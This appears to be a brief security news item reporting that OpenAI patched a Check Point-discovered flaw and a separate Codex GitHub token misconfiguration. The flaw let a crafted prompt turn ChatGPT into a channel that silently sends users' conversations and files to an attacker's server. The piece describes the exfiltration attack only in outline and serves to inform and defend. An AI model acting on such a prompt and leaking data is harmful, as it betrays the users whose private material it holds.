OpenAI has rolled out an urgent fix for a newly discovered vulnerability that could let malicious actors siphon off private ChatGPT conversations and uploaded files—without the user’s awareness. The flaw, identified by Check Point, shows how a single crafted prompt can transform an ordinary chat into a covert exfiltration channel. In addition, OpenAI addressed a separate issue involving a misconfigured Codex GitHub token that could grant attackers access to sensitive code repositories.
- Exfiltration via Prompt – A specially crafted prompt can trigger the model to transmit user data to an attacker-controlled endpoint, effectively turning the AI into a data‑leak tool.
- Quick Patch Released – OpenAI’s security team deployed an update that blocks the trigger vector and sanitizes user inputs, restoring the confidentiality of all active ChatGPT sessions.
- Codex Token Fix – The Codex GitHub token vulnerability has been corrected, preventing unauthorized API calls that could expose proprietary code.
These incidents underscore the importance of rigorous input validation and continuous security monitoring in AI platforms. While OpenAI’s rapid response mitigates the immediate risk, organizations that rely on ChatGPT or Codex should audit their deployment configurations, enforce strict token management, and stay alert for any anomalous API activity. The broader lesson is clear: as AI systems grow more powerful, so too must the safeguards that protect the data they process.
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html